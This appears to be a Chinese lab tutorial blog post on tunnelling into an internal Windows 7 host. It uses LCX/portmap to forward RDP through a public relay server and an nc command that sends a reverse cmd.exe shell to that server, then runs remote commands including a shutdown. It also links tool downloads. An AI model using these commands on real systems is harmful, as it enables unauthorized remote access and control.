打开监听端口失败_LCX端口转发及NC反弹

fa4b3aa366d2e0c49fbe90d95b768003.png
真理的蜡烛往往会烧伤那些举烛的人的手 —— 布埃斯特

环境

  • 攻击机 kali linux(IP:192.168.96.128)
  • 靶机:win7专业版(IP:192.168.96.130)
  • 公网服务器:centos(IP:就不说了,原因如下)

工具

  1. lcx :windows版是lcx.exe Linux版是portmap
  2. nc.exe

工具地址:https://pan.baidu.com/s/19Lm3H4BN0Yg9e7y0AhdF1A

提取码:mz6j

一.lcx端口转发

首先用xshell登陆到我的服务器

e88c54e085a93df14376c4f649143cdc.png

发现一个警告,一个IP尝试ssh登陆我的服务器,登陆了45次以失败告终,查了一下这个IP,尼泊尔的

1e747872b5c934b9c5da07c362e26707.png

我赶紧lastb查看一下登陆失败的ip

643e80dc0bc0e55b6104f0028787e0fe.png

不查不知道,一查吓一跳,来自几十个ip使用上百个用户名对我的服务器进行爆破过

所以这里我的服务器ip就打码了

1.在公网服务器上开启监听

我们解压工具包,使用ftp工具将portmap上传到服务器

执行命令:./portmap -m 2 -p1 3950 -h2 公网服务器IP -p2 3951

这条命令的意思是公网服务器监听3950端口收到的数据,将其转发到3951端口

6c6086df5af004d9478ccdbd63d52a5b.png

公网服务器开始进行监听

2.在内网肉鸡上将3389端口数据转发到公网服务器

当我们使用msf控制了一台机器后,可以使用upload命令将lcx.exe和nc.exe或是其他木马上传到目标机器,并用execute命令执行程序。

这里直接在靶机cmd进行演示

在靶机上切换到lcx.exe程序目录,执行命令:lcx.exe -slave 公网服务器ip 3950 127.0.0.1 3389

这条命令将内网靶机的3389端口转发到公网服务器的3950端口

8ba5ea4c7be3c3e89ca1004758ac8b24.png

回到公网服务器,已经收到了来自3950端口的数据

3abaa558f72119b7b54263563e904c36.png

3.连接内网肉鸡的远程桌面

打开攻击机,输入rdesktop 公网服务器IP:3951

21091eebd3df1ed8f39d57699775e844.png

成功连接

139e106337dafa94924e1a1037bd53b3.png

回忆一下

我们将内网肉鸡的3389端口转发到了公网服务器的3950端口下,公网服务器将3950收到的数据转发到3951等待处理,然后攻击者连接公网服务器的3951端口,便连接了内网肉鸡的3389端口。

二. nc反弹连接

1.在公网服务器开启nc监听

nc -lvp 3950(监听3950端口)

65303bafbb26e0e02429c0d134af835c.png

2.在内网肉鸡运行nc

切换到nc程序目录,执行nc.exe -t -e cmd.exe 公网服务器IP 3950

37bb03bbfe5b0a3f24a895a0ea1f4aec.png

查看肉鸡上正在运行的程序:tasklist

bfbb1d739f3d773054e576879ddd3f60.png

让肉鸡关机:shutdown -s -t 1

30744fcc70d818c833879fdd1975273c.png

肉鸡已经关机

9d90c7c9848f188def3a94fd46c95403.png

警告

本教程和工具仅供测试,不可用于非法用途。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值